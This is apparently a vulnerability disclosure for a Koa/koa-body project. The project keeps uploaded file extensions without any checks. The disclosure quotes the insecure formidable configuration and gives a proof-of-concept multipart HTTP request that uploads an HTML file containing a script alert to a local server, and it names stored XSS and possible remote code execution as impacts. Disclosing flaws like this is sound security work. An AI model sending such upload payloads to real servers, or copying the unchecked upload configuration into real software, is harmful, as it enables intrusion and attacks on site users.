kkxiaojun
Arbitrarily File Upload Vulnerability
Summary
The project uses formidable with keepExtensions set to true, and has no other file upload checking mechanisms. It allows attackers to upload malicious files with arbitrary extensions, potentially creating attack vectors for stored Cross-Site Scripting (XSS), even Remote Code Execution (RCE) attacks.
Details
Code Analysis
package.json
"koa-body": "^4.2.0",
node_modules\koa-body\package.json
"@types/formidable": "^1.0.31",
src\app.ts
app.use(
KoaBody({
// 支持文件格式
multipart: true,
formidable: {
// 上传目录
uploadDir: Path.join(__dirname, '../public/uploads'),
// 保留文件扩展名
keepExtensions: true,
},
})
)
Here, global file upload requests are configured to be handled by Formidable, and file extensions are preserved (keepExtensions: true). This means I can send any file upload request to the service without needing to know what the endpoint is.
POC
POST /testyadfygsudsaidusod HTTP/1.1
Host: 127.0.0.1:6200
Content-Length: 207
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykydz3yRY7gBp5Pa6
------WebKitFormBoundarykydz3yRY7gBp5Pa6
Content-Disposition: form-data; name="file1"; filename="xss3.html"
Content-Type: image/jpeg
<script>alert(3)</script>
------WebKitFormBoundarykydz3yRY7gBp5Pa6--
Upload an HTML file containing XSS vector. From the HTTP response, we can see that the file's URL is not returned.
When we looked at the corresponding directory for storing uploaded files /public/uploads, we discovered that the malicious file had already been successfully uploaded.
2025/02/26 16:28 <DIR> .
2025/02/26 16:16 <DIR> ..
2025/02/26 16:28 25 upload_8be0c1b8e1a8794985aa7420ed588ace.html
Impact
-
Code execution:
- Allows attackers to upload server-side script files such as PHP, JSP, etc.
- If the target server has corresponding interpreters, this may lead to remote code execution
-
Client-side attacks:
- Enables attackers to upload files with extensions like HTML, PDF containing malicious scripts
- Thus creating stored XSS attack vectors that can target client users
